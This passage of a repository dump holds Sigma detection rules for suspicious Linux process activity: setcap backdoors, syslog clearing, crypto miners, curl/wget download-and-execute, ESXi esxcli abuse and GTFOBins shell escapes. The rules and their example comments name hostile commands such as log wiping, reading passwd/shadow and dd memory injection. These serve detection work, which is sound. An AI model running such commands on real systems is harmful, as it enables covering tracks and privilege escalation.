falsepositives: - Legitimate usage of the unsafe option level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_cap_setgid.yml ================================================ title: Linux Setgid Capability Set on a Binary via Setcap Utility id: 3a716279-c18c-4488-83be-f9ececbfb9fc status: experimental description: | Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs), including setting its current GID to a value that would otherwise be restricted (i.e. GID 0, the root group). This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed. references: - https://man7.org/linux/man-pages/man8/setcap.8.html - https://dfir.ch/posts/linux_capabilities/ - https://juggernaut-sec.com/capabilities/#cap_setgid author: Luc Génaux date: 2026-01-24 tags: - attack.privilege-escalation - attack.defense-evasion - attack.persistence - attack.t1548 - attack.t1554 logsource: product: linux category: process_creation detection: selection: Image|endswith: '/setcap' CommandLine|contains: 'cap_setgid' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_cap_setuid.yml ================================================ title: Linux Setuid Capability Set on a Binary via Setcap Utility id: ed447910-bc30-4575-a598-3a2e49516a7a status: experimental description: | Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file. This capability allows a non privileged process to make arbitrary manipulations of user IDs (UIDs), including setting its current UID to a value that would otherwise be restricted (i.e. UID 0, the root user). 
This behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed. references: - https://man7.org/linux/man-pages/man8/setcap.8.html - https://dfir.ch/posts/linux_capabilities/ - https://juggernaut-sec.com/capabilities/#cap_setuid author: Luc Génaux date: 2026-01-24 tags: - attack.privilege-escalation - attack.defense-evasion - attack.persistence - attack.t1548 - attack.t1554 logsource: product: linux category: process_creation detection: selection: Image|endswith: '/setcap' CommandLine|contains: 'cap_setuid' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml ================================================ title: Capabilities Discovery - Linux id: d8d97d51-122d-4cdd-9e2f-01b4b4933530 status: test description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other. references: - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes - https://github.com/carlospolop/PEASS-ng - https://github.com/diego-treitos/linux-smart-enumeration author: Nasreddine Bencherchali (Nextron Systems) date: 2022-12-28 modified: 2026-01-24 tags: - attack.discovery - attack.t1083 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/getcap' CommandLine|contains: ' -r ' condition: selection falsepositives: - Unknown level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_capsh_shell_invocation.yml ================================================ title: Capsh Shell Invocation - Linux id: db1ac3be-f606-4e3a-89e0-9607cbe6b98a status: test description: | Detects the use of the "capsh" utility to invoke a shell. 
references: - https://gtfobins.github.io/gtfobins/capsh/#shell - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) date: 2024-09-02 tags: - attack.execution - attack.t1059 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/capsh' CommandLine|endswith: ' --' condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml ================================================ title: Remove Immutable File Attribute id: 34979410-e4b5-4e5d-8cfb-389fdff05c12 related: - id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 type: derived status: test description: Detects usage of the 'chattr' utility to remove immutable file attribute. references: - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html author: Nasreddine Bencherchali (Nextron Systems) date: 2022-09-15 tags: - attack.defense-evasion - attack.t1222.002 logsource: product: linux category: process_creation detection: selection: Image|endswith: '/chattr' CommandLine|contains: ' -i ' condition: selection falsepositives: - Administrator interacting with immutable files (e.g. for instance backups). level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_chroot_execution.yml ================================================ title: Linux Sudo Chroot Execution id: f2bed782-994e-4f40-9cd5-518198cb3fba status: experimental description: | Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. Attackers may use this technique to evade detection and execute commands in a modified environment. 
This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463. While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts. references: - https://github.com/kh4sh3i/CVE-2025-32463/blob/81bb430f84fa2089224733c3ed4bfa434c197ad4/exploit.sh author: Swachchhanda Shrawn Poudel (Nextron Systems) date: 2025-10-02 tags: - attack.privilege-escalation - attack.t1068 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/sudo' CommandLine|contains: - ' --chroot ' - 'sudo -R ' condition: selection falsepositives: - Legitimate administrative tasks or scripts that use 'sudo --chroot' for containerization, testing, or system management. level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_clear_logs.yml ================================================ title: Clear Linux Logs id: 80915f59-9b56-4616-9de0-fd0dea6c12fe status: stable description: Detects attempts to clear logs on the system. 
Adversaries may clear system logs to hide evidence of an intrusion references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md author: Ömer Günal, oscd.community date: 2020-10-07 modified: 2022-09-15 tags: - attack.defense-evasion - attack.t1070.002 logsource: product: linux category: process_creation detection: selection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' - '/unlink' CommandLine|contains: - '/var/log' - '/var/spool/mail' condition: selection falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml ================================================ title: Syslog Clearing or Removal Via System Utilities id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 status: test description: | Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md - https://www.virustotal.com/gui/file/54d60fd58d7fa3475fa123985bfc1594df26da25c1f5fbc7dfdba15876dd8ac5/behavior author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC date: 2021-10-15 modified: 2025-10-15 tags: - attack.defense-evasion - attack.t1070.002 logsource: product: linux category: process_creation detection: selection_file: CommandLine|contains: '/var/log/syslog' selection_command_rm: # Examples: # rm -f /var/log/syslog Image|endswith: '/rm' CommandLine|contains: - ' -r ' - ' -f ' - ' -rf ' - '/var/log/syslog' # We use this to avoid re-writing a separate selection selection_command_unlink: # Examples: # unlink /var/log/syslog Image|endswith: '/unlink' selection_command_mv: # Examples: # mv /var/log/syslog Image|endswith: '/mv' 
selection_command_truncate: # Examples: # truncate --size 0 /var/log/syslog Image|endswith: '/truncate' CommandLine|contains|all: - '0 ' - '/var/log/syslog' # We use this to avoid re-writing a separate selection CommandLine|contains: - '-s ' - '-c ' - '--size' selection_command_ln: # Examples: # ln -sfn /dev/null /var/log/syslog Image|endswith: '/ln' CommandLine|contains|all: - '/dev/null ' - '/var/log/syslog' # We use this to avoid re-writing a separate selection CommandLine|contains: - '-sf ' - '-sfn ' - '-sfT ' selection_command_cp: # Examples: # cp /dev/null /var/log/syslog Image|endswith: '/cp' CommandLine|contains: '/dev/null' selection_command_shred: # Examples: # shred -u /var/log/syslog Image|endswith: '/shred' CommandLine|contains: '-u ' selection_unique_other: CommandLine|contains: - ' > /var/log/syslog' - ' >/var/log/syslog' - ' >| /var/log/syslog' # redirection empties w spacing, noclobber - ': > /var/log/syslog' - ':> /var/log/syslog' - ':>/var/log/syslog' - '>|/var/log/syslog' selection_unique_journalctl: CommandLine|contains: - 'journalctl --vacuum' - 'journalctl --rotate' # archives current journal files and creates new empty ones condition: (selection_file and 1 of selection_command_*) or 1 of selection_unique_* falsepositives: - Log rotation. - Maintenance. level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml ================================================ title: Clipboard Collection with Xclip Tool id: ec127035-a636-4b9a-8555-0efd4e59f316 status: test description: | Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. 
references: - https://www.packetlabs.net/posts/clipboard-data-security/ author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC date: 2021-10-15 modified: 2022-09-15 tags: - attack.collection - attack.t1115 logsource: product: linux category: process_creation detection: selection: Image|contains: 'xclip' CommandLine|contains|all: - '-sel' - 'clip' - '-o' condition: selection falsepositives: - Legitimate usage of xclip tools. level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml ================================================ title: Copy Passwd Or Shadow From TMP Path id: fa4aaed5-4fe0-498d-bbc0-08e3346387ba status: test description: Detects when the file "passwd" or "shadow" is copied from tmp path references: - https://blogs.blackberry.com/ - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-01-31 tags: - attack.credential-access - attack.t1552.001 logsource: product: linux category: process_creation detection: selection_img: Image|endswith: '/cp' selection_path: CommandLine|contains: '/tmp/' selection_file: CommandLine|contains: - 'passwd' - 'shadow' condition: all of selection_* falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml ================================================ title: Crontab Enumeration id: 403ed92c-b7ec-4edd-9947-5b535ee12d46 status: test description: Detects usage of crontab to list the tasks of the user references: - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 
author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-06-02 tags: - attack.discovery - attack.t1007 logsource: product: linux category: process_creation detection: selection: Image|endswith: '/crontab' CommandLine|contains: ' -l' condition: selection falsepositives: - Legitimate use of crontab level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml ================================================ title: Remove Scheduled Cron Task/Job id: c2e234de-03a3-41e1-b39a-1e56dc17ba67 status: test description: | Detects usage of the 'crontab' utility to remove the current crontab. This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible references: - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html author: Nasreddine Bencherchali (Nextron Systems) date: 2022-09-15 tags: - attack.defense-evasion logsource: category: process_creation product: linux detection: selection: Image|endswith: 'crontab' CommandLine|contains: ' -r' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml ================================================ title: Linux Crypto Mining Indicators id: 9069ea3c-b213-4c52-be13-86506a227ab1 status: test description: Detects command line parameters or strings often used by crypto miners references: - https://www.poolwatch.io/coin/monero author: Florian Roth (Nextron Systems) date: 2021-10-26 modified: 2022-12-25 tags: - attack.impact - attack.t1496 logsource: product: linux category: process_creation detection: selection: CommandLine|contains: - ' --cpu-priority=' - '--donate-level=0' - ' -o pool.' 
- ' --nicehash' - ' --algo=rx/0 ' - 'stratum+tcp://' - 'stratum+udp://' # Sub process started by xmrig - the most popular Monero crypto miner - unknown if this causes any false positives - 'sh -c /sbin/modprobe msr allow_writes=on' # base64 encoded: --donate-level= - 'LS1kb25hdGUtbGV2ZWw9' - '0tZG9uYXRlLWxldmVsP' - 'tLWRvbmF0ZS1sZXZlbD' # base64 encoded: stratum+tcp:// and stratum+udp:// - 'c3RyYXR1bSt0Y3A6Ly' - 'N0cmF0dW0rdGNwOi8v' - 'zdHJhdHVtK3RjcDovL' - 'c3RyYXR1bSt1ZHA6Ly' - 'N0cmF0dW0rdWRwOi8v' - 'zdHJhdHVtK3VkcDovL' condition: selection falsepositives: - Legitimate use of crypto miners level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_curl_usage.yml ================================================ title: Curl Usage on Linux id: ea34fb97-e2c4-4afb-810f-785e4459b194 status: test description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server references: - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html author: Nasreddine Bencherchali (Nextron Systems) date: 2022-09-15 tags: - attack.command-and-control - attack.t1105 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/curl' condition: selection falsepositives: - Scripts created by developers and admins - Administrative activity level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_curl_wget_exec_tmp.yml ================================================ title: Suspicious Download and Execute Pattern via Curl/Wget id: a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa status: experimental description: | Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating 
potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks. references: - https://gtfobins.github.io/gtfobins/wget/ - https://gtfobins.github.io/gtfobins/curl/ author: Aayush Gupta date: 2025-06-17 tags: - attack.execution - attack.t1059.004 - attack.t1203 logsource: category: process_creation product: linux detection: selection_downloader: CommandLine|contains: - '/curl' - '/wget' selection_tmp: CommandLine|contains: - '/tmp/' - '/dev/shm/' selection_executor: CommandLine|contains: 'sh -c' condition: all of selection_* falsepositives: - System update scripts using temporary files - Installer scripts or automated provisioning tools level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_dd_file_overwrite.yml ================================================ title: DD File Overwrite id: 2953194b-e33c-4859-b9e8-05948c167447 status: test description: Detects potential overwriting and deletion of a file using DD. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC date: 2021-10-15 modified: 2022-07-07 tags: - attack.impact - attack.t1485 logsource: product: linux category: process_creation detection: selection1: Image: - '/bin/dd' - '/usr/bin/dd' selection2: CommandLine|contains: 'of=' selection3: CommandLine|contains: - 'if=/dev/zero' - 'if=/dev/null' condition: all of selection* falsepositives: - Any user deleting files that way. 
level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml ================================================ title: Potential Linux Process Code Injection Via DD Utility id: 4cad6c64-d6df-42d6-8dae-eb78defdc415 status: test description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command. references: - https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/ - https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh author: Joseph Kamau date: 2023-12-01 tags: - attack.privilege-escalation - attack.defense-evasion - attack.t1055.009 logsource: product: linux category: process_creation detection: selection: Image|endswith: '/dd' CommandLine|contains|all: - 'of=' - '/proc/' - '/mem' condition: selection falsepositives: - Unknown level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml ================================================ title: Ufw Force Stop Using Ufw-Init id: 84c9e83c-599a-458a-a0cb-0ecce44e807a status: test description: Detects attempts to force stop the ufw using ufw-init references: - https://blogs.blackberry.com/ - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 author: Joseliyo Sanchez, @Joseliyo_Jstnk date: 2023-01-18 tags: - attack.defense-evasion - attack.t1562.004 logsource: product: linux category: process_creation detection: selection_init: CommandLine|contains|all: - '-ufw-init' - 'force-stop' selection_ufw: CommandLine|contains|all: - 'ufw' - 'disable' condition: 1 of selection_* falsepositives: - Network administrators level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_doas_execution.yml ================================================ title: Linux Doas Tool 
Execution id: 067d8238-7127-451c-a9ec-fa78045b618b status: stable description: Detects execution of the doas tool on a Linux host. This utility allows standard users to perform tasks as root, in the same way sudo does. references: - https://research.splunk.com/endpoint/linux_doas_tool_execution/ - https://www.makeuseof.com/how-to-install-and-use-doas/ author: Sittikorn S, Teoderick Contreras date: 2022-01-20 tags: - attack.defense-evasion - attack.privilege-escalation - attack.t1548 logsource: product: linux category: process_creation detection: selection: Image|endswith: '/doas' condition: selection falsepositives: - Unlikely level: low ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_env_shell_invocation.yml ================================================ title: Shell Invocation via Env Command - Linux id: bed978f8-7f3a-432b-82c5-9286a9b3031a status: test description: | Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands. references: - https://gtfobins.github.io/gtfobins/env/#shell - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) 
date: 2024-09-02 tags: - attack.execution - attack.t1059 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/env' CommandLine|endswith: - '/bin/bash' - '/bin/dash' - '/bin/fish' - '/bin/sh' - '/bin/zsh' condition: selection falsepositives: - Github operations such as ghe-backup level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml ================================================ title: ESXi Network Configuration Discovery Via ESXCLI id: 33e814e0-1f00-4e43-9c34-31fb7ae2b174 status: test description: Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration. references: - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_network.html author: Cedric Maurugeon date: 2023-09-04 tags: - attack.discovery - attack.execution - attack.t1033 - attack.t1007 - attack.t1059.012 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: '/esxcli' CommandLine|contains: 'network' selection_cli: CommandLine|contains: - ' get' - ' list' condition: all of selection_* falsepositives: - Legitimate administration activities # Note: level can be reduced to low in some envs level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_permission_change_admin.yml ================================================ title: ESXi Admin Permission Assigned To Account Via ESXCLI id: 9691f58d-92c1-4416-8bf3-2edd753ec9cf status: test description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account. 
references: - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html author: Nasreddine Bencherchali (Nextron Systems) date: 2023-09-04 tags: - attack.persistence - attack.execution - attack.privilege-escalation - attack.t1059.012 - attack.t1098 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/esxcli' CommandLine|contains: 'system' CommandLine|contains|all: - ' permission ' - ' set' - 'Admin' condition: selection falsepositives: - Legitimate administration activities level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml ================================================ title: ESXi Storage Information Discovery Via ESXCLI id: f41dada5-3f56-4232-8503-3fb7f9cf2d60 status: test description: Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit. 
references: - https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html - https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_storage.html author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon date: 2023-09-04 tags: - attack.discovery - attack.execution - attack.t1033 - attack.t1007 - attack.t1059.012 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: '/esxcli' CommandLine|contains: 'storage' selection_cli: CommandLine|contains: - ' get' - ' list' condition: all of selection_* falsepositives: - Legitimate administration activities # Note: level can be reduced to low in some envs level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml ================================================ title: ESXi Syslog Configuration Change Via ESXCLI id: 38eb1dbb-011f-40b1-a126-cf03a0210563 status: test description: Detects changes to the ESXi syslog configuration via "esxcli" references: - https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html author: Cedric Maurugeon date: 2023-09-04 tags: - attack.defense-evasion - attack.execution - attack.t1562.001 - attack.t1562.003 - attack.t1059.012 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/esxcli' CommandLine|contains|all: - 'system' - 'syslog' - 'config' CommandLine|contains: ' set' condition: selection falsepositives: - Legitimate administrative activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml 
================================================ title: ESXi System Information Discovery Via ESXCLI id: e80273e1-9faf-40bc-bd85-dbaff104c4e9 status: test description: Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different component of the system. Such as accounts, modules, NTP, etc. references: - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html author: Cedric Maurugeon date: 2023-09-04 tags: - attack.discovery - attack.execution - attack.t1033 - attack.t1007 - attack.t1059.012 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: '/esxcli' CommandLine|contains: 'system' selection_cli: CommandLine|contains: - ' get' - ' list' condition: all of selection_* falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_user_account_creation.yml ================================================ title: ESXi Account Creation Via ESXCLI id: b28e4eb3-8bbc-4f0c-819f-edfe8e2f25db status: test description: Detects user account creation on ESXi system via esxcli references: - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html author: Cedric Maurugeon date: 2023-08-22 tags: - attack.persistence - attack.execution - attack.t1136 - attack.t1059.012 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/esxcli' CommandLine|contains|all: - 'system ' - 'account ' - 'add ' condition: selection falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml ================================================ 
title: ESXi VM List Discovery Via ESXCLI id: 5f1573a7-363b-4114-9208-ad7a61de46eb status: test description: Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs. references: - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html - https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/ - https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html author: Cedric Maurugeon date: 2023-09-04 tags: - attack.discovery - attack.execution - attack.t1033 - attack.t1007 - attack.t1059.012 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/esxcli' CommandLine|contains: 'vm process' CommandLine|endswith: ' list' condition: selection falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml ================================================ title: ESXi VM Kill Via ESXCLI id: 2992ac4d-31e9-4325-99f2-b18a73221bb2 status: test description: Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM. 
references: - https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html - https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/ - https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon date: 2023-09-04 tags: - attack.execution - attack.impact - attack.t1059.012 - attack.t1529 logsource: category: process_creation product: linux detection: selection: Image|endswith: '/esxcli' CommandLine|contains|all: - 'vm process' - 'kill' condition: selection falsepositives: - Legitimate administration activities level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_esxcli_vsan_discovery.yml ================================================ title: ESXi VSAN Information Discovery Via ESXCLI id: d54c2f06-aca9-4e2b-81c9-5317858f4b79 status: test description: Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide. 
references: - https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html - https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vsan.html author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon date: 2023-09-04 tags: - attack.discovery - attack.execution - attack.t1033 - attack.t1007 - attack.t1059.012 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: '/esxcli' CommandLine|contains: 'vsan' selection_cli: CommandLine|contains: - ' get' - ' list' condition: all of selection_* falsepositives: - Legitimate administration activities # Note: level can be reduced to low in some envs level: medium ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml ================================================ title: File and Directory Discovery - Linux id: d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72 status: test description: | Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares. 
references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md author: Daniil Yugoslavskiy, oscd.community, CheraghiMilad date: 2020-10-19 modified: 2024-12-01 tags: - attack.discovery - attack.t1083 logsource: category: process_creation product: linux detection: selection_file_with_asterisk: Image|endswith: '/file' CommandLine|re: '(.){200,}' # execution of the 'file */* *>> /tmp/output.txt' will produce huge commandline selection_recursive_ls: Image|endswith: '/ls' CommandLine|contains: '-R' selection_find_execution: Image|endswith: '/find' selection_tree_execution: Image|endswith: '/tree' selection_findmnt_execution: Image|endswith: '/findmnt' selection_locate_execution: Image|endswith: '/mlocate' condition: 1 of selection_* falsepositives: - Legitimate activities level: informational ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_file_deletion.yml ================================================ title: File Deletion id: 30aed7b6-d2c1-4eaf-9382-b6bc43e50c57 status: stable description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md author: Ömer Günal, oscd.community date: 2020-10-07 modified: 2022-09-15 tags: - attack.defense-evasion - attack.t1070.004 logsource: product: linux category: process_creation detection: selection: Image|endswith: - '/rm' # covers /rmdir as well - '/shred' - '/unlink' condition: selection falsepositives: - Legitimate administration activities level: informational ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_find_shell_execution.yml ================================================ title: Shell Execution 
via Find - Linux id: 6adfbf8f-52be-4444-9bac-81b539624146 status: test description: | Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt. references: - https://gtfobins.github.io/gtfobins/find/#shell - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) date: 2024-09-02 tags: - attack.discovery - attack.t1083 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: '/find' CommandLine|contains|all: - ' . ' - '-exec' selection_cli: CommandLine|contains: - '/bin/bash' - '/bin/dash' - '/bin/fish' - '/bin/sh' - '/bin/zsh' condition: all of selection_* falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_flock_shell_execution.yml ================================================ title: Shell Execution via Flock - Linux id: 4b09c71e-4269-4111-9cdd-107d8867f0cc status: test description: | Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. references: - https://gtfobins.github.io/gtfobins/flock/#shell - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) 
date: 2024-09-02 tags: - attack.discovery - attack.t1083 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: '/flock' CommandLine|contains: ' -u ' selection_cli: CommandLine|contains: - '/bin/bash' - '/bin/dash' - '/bin/fish' - '/bin/sh' - '/bin/zsh' condition: all of selection_* falsepositives: - Unknown level: high ================================================ FILE: rules/linux/process_creation/proc_creation_lnx_gcc_shell_execution.yml ================================================ title: Shell Execution GCC - Linux id: 9b5de532-a757-4d70-946c-1f3e44f48b4d status: test description: | Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. references: - https://gtfobins.github.io/gtfobins/gcc/#shell - https://gtfobins.github.io/gtfobins/c89/#shell - https://gtfobins.github.io/gtfobins/c99/#shell - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.) date: 2024-09-02 tags: - attack.discovery - attack.t1083 logsource: category: process_creation product: linux detection: selection_img: Image|endswith: - '/c89' - '/c99' - '/gcc' CommandLine|contains: '-wrapper' selection_cli: CommandLine|contains: - 